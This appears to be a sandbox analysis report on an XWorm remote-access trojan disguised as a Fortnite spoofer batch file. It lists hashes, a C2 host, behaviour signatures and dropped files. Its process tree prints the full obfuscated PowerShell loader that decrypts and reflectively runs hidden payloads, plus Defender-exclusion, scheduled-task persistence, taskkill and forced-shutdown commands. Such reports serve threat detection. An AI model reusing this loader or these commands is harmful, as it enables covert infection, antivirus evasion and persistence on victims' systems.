Analysis

  • max time kernel
    246s
  • max time network
    247s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags
    arch:x64 arch:x86 image:win11-20241007-en locale:en-us os:windows11-21h2-x64 system
  • submitted
    23-01-2025 18:40

Errors

Reason
Machine shutdown

General

  • Target

    SpooferFornite.bat

  • Size

    289KB

  • MD5

    1776b4ed272a4c874cb62d3827da9330

  • SHA1

    15611ee351e8fdb75b6d65fb5a2e111c3fed6b2e

  • SHA256

    9b4083ac2dee0d90ca305780b1318931af119cccd8e9516dd443f3a5ff3e0af7

  • SHA512

    e498841716e88b7ad28b53d33e4a448361abab540642171f9a8fc07f6f4e097d9aff20f4489c2ad49a76b0b94f27cc57a234022fe1c75174af641c72151d613e

  • SSDEEP

    6144:TO/Pb0ZIWr3AuGHdOOJvpW2hZkewDbShSj2+AoACcSc2hJaDeAnul2xojol9r:TO/bTNHdxW2rkewDbc8cH/x4o3r

Malware Config

Extracted

Family

xworm

C2

IDKTOBEHONESTNIGAS-56344.portmap.io:56344

Attributes
  • Install_directory

    %ProgramData%

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SpooferFornite.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2208
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('noPxVH3ddu1PqIPnSt7r1xd0OgXVM9X59CLWUoO1zk4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IjrdQlHUkjBl27IgF/hgbA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $MKRBP=New-Object System.IO.MemoryStream(,$param_var); $PgIYR=New-Object System.IO.MemoryStream; $kyRBD=New-Object System.IO.Compression.GZipStream($MKRBP, [IO.Compression.CompressionMode]::Decompress); $kyRBD.CopyTo($PgIYR); $kyRBD.Dispose(); $MKRBP.Dispose(); $PgIYR.Dispose(); $PgIYR.ToArray();}function execute_function($param_var,$param2_var){ $WZIdA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $beHJX=$WZIdA.EntryPoint; $beHJX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\SpooferFornite.bat';$CsLar=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\SpooferFornite.bat').Split([Environment]::NewLine);foreach ($HvFyD in $CsLar) { if ($HvFyD.StartsWith(':: ')) { $zZbDh=$HvFyD.Substring(3); break; }}$payloads_var=[string[]]$zZbDh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1156
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_896_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_896.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4368
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_896.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4440
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_896.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:800
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('noPxVH3ddu1PqIPnSt7r1xd0OgXVM9X59CLWUoO1zk4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IjrdQlHUkjBl27IgF/hgbA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $MKRBP=New-Object System.IO.MemoryStream(,$param_var); $PgIYR=New-Object System.IO.MemoryStream; $kyRBD=New-Object System.IO.Compression.GZipStream($MKRBP, [IO.Compression.CompressionMode]::Decompress); $kyRBD.CopyTo($PgIYR); $kyRBD.Dispose(); $MKRBP.Dispose(); $PgIYR.Dispose(); $PgIYR.ToArray();}function execute_function($param_var,$param2_var){ $WZIdA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $beHJX=$WZIdA.EntryPoint; $beHJX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_896.bat';$CsLar=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_896.bat').Split([Environment]::NewLine);foreach ($HvFyD in $CsLar) { if ($HvFyD.StartsWith(':: ')) { $zZbDh=$HvFyD.Substring(3); break; }}$payloads_var=[string[]]$zZbDh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4948
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4536
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4876
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1964
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "powershell" /tr "C:\ProgramData\powershell.exe"
              6⤵
              • Scheduled Task/Job: Scheduled Task
              PID:1904
            • C:\Windows\SYSTEM32\taskkill.exe
              taskkill /F /IM explorer.exe
              6⤵
              • Kills process with taskkill
              PID:240
            • C:\Windows\SYSTEM32\shutdown.exe
              shutdown.exe /f /s /t 0
              6⤵
                PID:2668
  • C:\ProgramData\powershell.exe
    C:\ProgramData\powershell.exe
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    PID:3716
  • C:\ProgramData\powershell.exe
    C:\ProgramData\powershell.exe
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    PID:2848
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004D0
    1⤵
    PID:3148
  • C:\ProgramData\powershell.exe
    C:\ProgramData\powershell.exe
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    PID:4532
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x4 /state0:0xa3952055 /state1:0x41c64e6d
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious use of SetWindowsHookEx
    PID:3704

MITRE ATT&CK Enterprise v15

Downloads

      • C:\ProgramData\powershell.exe

        Filesize

        440KB

        MD5

        0e9ccd796e251916133392539572a374

        SHA1

        eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

        SHA256

        c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

        SHA512

        e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        df472dcddb36aa24247f8c8d8a517bd7

        SHA1

        6f54967355e507294cbc86662a6fbeedac9d7030

        SHA256

        e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

        SHA512

        06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

        Filesize

        62KB

        MD5

        e566632d8956997225be604d026c9b39

        SHA1

        94a9aade75fffc63ed71404b630eca41d3ce130e

        SHA256

        b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0

        SHA512

        f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

        Filesize

        1KB

        MD5

        c81d47c3b95d180e012e8380740c4349

        SHA1

        702eded5bde64ab869985b0934655e18dbdc6a70

        SHA256

        cfaa4c0d9f07288af8d6722f228edf33b0d87a4fde1b468f0c3afb837cd061cc

        SHA512

        982beff2c7b39aa271d26424c51e2e10f0a3ea7e1f7321e37397e7811feb409b39408a6cb22b6dfe271cd9c1048b89f5a80e193b570d18a46b7acc2e542f21f1

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

        Filesize

        1KB

        MD5

        13ef30e34b94ea33ab4d9fe62b5c3957

        SHA1

        fc16df86061fd69b1880b425cb5d495c8ba346ba

        SHA256

        e7838f2f4cb769049d9073a31a06242c14df2fbd6f349575cfdc093c8df87ff1

        SHA512

        58200a222466e172879760f2978a30f3c5a2ccb7e696bb664b3f7e020a55c0e580404daac0e6576d7836c6368b557e1fba4732acc957795402cfa3b2e2d7ad53

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        59d37a8c588c83e806678c7fb5d1229f

        SHA1

        4396d68567f30f08e08a269802fe3f4784b88c5b

        SHA256

        c1af181e4703177ae1c55f2160c6b7685f3536da35a1501e4a70e25155519e84

        SHA512

        19223db6932776bdfcd8202a8ca19e60deacacdc6e44f2f219b541b4e2eadb82c7c819512f17c76f9ca177ca89452adbebf30dceef9fcc05085472ff49ea8dc2

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        1a9fa92a4f2e2ec9e244d43a6a4f8fb9

        SHA1

        9910190edfaccece1dfcc1d92e357772f5dae8f7

        SHA256

        0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

        SHA512

        5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        190b28f40c0edd3cc08d0fd3aca4779a

        SHA1

        425b98532b6a18aa2baece47605f1cf6c8cfbd11

        SHA256

        8a2c650430d93841587c726ffff72fb64e02d2da24c9d8df17e835d1124d53ce

        SHA512

        8d1c7a20b324937face0e0c9249d635b3dfcfbad004928de731baf0d72df9ee64fb3f482451d20eb55fa0364311a9806e9d49ae4eafca38d6b58a988f8807110

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_20eh3qyn.z5k.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\startup_str_896.bat

        Filesize

        289KB

        MD5

        1776b4ed272a4c874cb62d3827da9330

        SHA1

        15611ee351e8fdb75b6d65fb5a2e111c3fed6b2e

        SHA256

        9b4083ac2dee0d90ca305780b1318931af119cccd8e9516dd443f3a5ff3e0af7

        SHA512

        e498841716e88b7ad28b53d33e4a448361abab540642171f9a8fc07f6f4e097d9aff20f4489c2ad49a76b0b94f27cc57a234022fe1c75174af641c72151d613e

      • C:\Users\Admin\AppData\Roaming\startup_str_896.vbs

        Filesize

        115B

        MD5

        e3516fa0556c66f2688fdb20ca215efa

        SHA1

        75cab0b89b7f62ecc2a44b804b4f120977abcd71

        SHA256

        790d99e90285df45fa2258ba8e4fbe72b3dd9b67670ad1c2a1d7f72bcda37b20

        SHA512

        18903ce89076c61eb58d870ab85fae7ff5d5f45103368928caef05432548f9780cf3ab6b59bd6bc448e6874d2e358951a58e02e2df127c84a093e3f044443462

      • memory/1156-0-0x00007FFC2A033000-0x00007FFC2A035000-memory.dmp

        Filesize

        8KB

      • memory/1156-14-0x000002AB24E30000-0x000002AB24E68000-memory.dmp

        Filesize

        224KB

      • memory/1156-13-0x000002AB24D90000-0x000002AB24D98000-memory.dmp

        Filesize

        32KB

      • memory/1156-79-0x00007FFC2A030000-0x00007FFC2AAF2000-memory.dmp

        Filesize

        10.8MB

      • memory/1156-12-0x00007FFC2A030000-0x00007FFC2AAF2000-memory.dmp

        Filesize

        10.8MB

      • memory/1156-11-0x00007FFC2A030000-0x00007FFC2AAF2000-memory.dmp

        Filesize

        10.8MB

      • memory/1156-10-0x00007FFC2A030000-0x00007FFC2AAF2000-memory.dmp

        Filesize

        10.8MB

      • memory/1156-9-0x000002AB24DA0000-0x000002AB24DC2000-memory.dmp

        Filesize

        136KB

      • memory/1156-78-0x00007FFC2A033000-0x00007FFC2A035000-memory.dmp

        Filesize

        8KB

      • memory/3716-97-0x000001B25E120000-0x000001B25E166000-memory.dmp

        Filesize

        280KB

      • memory/4368-24-0x00007FFC2A030000-0x00007FFC2AAF2000-memory.dmp

        Filesize

        10.8MB

      • memory/4368-30-0x00007FFC2A030000-0x00007FFC2AAF2000-memory.dmp

        Filesize

        10.8MB

      • memory/4368-27-0x00007FFC2A030000-0x00007FFC2AAF2000-memory.dmp

        Filesize

        10.8MB

      • memory/4368-26-0x00007FFC2A030000-0x00007FFC2AAF2000-memory.dmp

        Filesize

        10.8MB

      • memory/4368-25-0x00007FFC2A030000-0x00007FFC2AAF2000-memory.dmp

        Filesize

        10.8MB

      • memory/4948-48-0x000002462BA50000-0x000002462BA66000-memory.dmp

        Filesize

        88KB

      • memory/4948-98-0x000002462C0E0000-0x000002462C0EC000-memory.dmp

        Filesize

        48KB

      • memory/4948-100-0x0000024613420000-0x000002461342C000-memory.dmp

        Filesize

        48KB

      • memory/4948-101-0x000002462D550000-0x000002462DA78000-memory.dmp

        Filesize

        5.2MB

      • memory/4948-116-0x000002462BA40000-0x000002462BA4A000-memory.dmp

        Filesize

        40KB

      • memory/4948-120-0x000002462C540000-0x000002462C54A000-memory.dmp

        Filesize

        40KB